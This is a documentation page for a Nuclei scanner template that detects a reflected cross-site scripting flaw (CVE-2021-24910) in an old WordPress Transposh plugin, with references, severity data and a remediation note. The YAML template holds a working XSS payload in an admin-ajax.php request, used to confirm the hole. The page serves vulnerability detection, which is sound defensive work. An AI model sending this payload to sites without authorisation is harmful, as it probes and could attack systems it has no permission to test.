WordPress Transposh Translation <1.0.8 - Cross-Site Scripting
ID: CVE-2021-24910
Severity: medium
Author: Screamy
Tags: cve2021,cve,wordpress,wp-plugin,xss,wp,wpscan,transposh
Description
Section titled “Description”WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response.
YAML Source
Section titled “YAML Source”id: CVE-2021-24910
info: name: WordPress Transposh Translation <1.0.8 - Cross-Site Scripting author: Screamy severity: medium description: WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress Transposh Translation plugin to version 1.0.8 or later to mitigate the vulnerability. reference: - https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/ - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt - https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17 - https://nvd.nist.gov/vuln/detail/CVE-2021-24910 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24910 cwe-id: CWE-79 epss-score: 0.00086 epss-percentile: 0.35299 cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: transposh product: transposh_wordpress_translation framework: wordpress tags: cve2021,cve,wordpress,wp-plugin,xss,wp,wpscan,transposh
http: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>"
matchers-condition: and matchers: - type: word part: body words: - '<img src=x onerror=alert(document.domain)>' - '{"result":' condition: and
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4a0a004730450220367a3cdbbbbcbe4636f679bc590d0c805122288e61b0330c6953b237b36b1bf4022100c846bfe87b2fe6c100f748590bbc063f8d8495b26d1ca29ac8a8b9346366e0c6:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24910.yaml"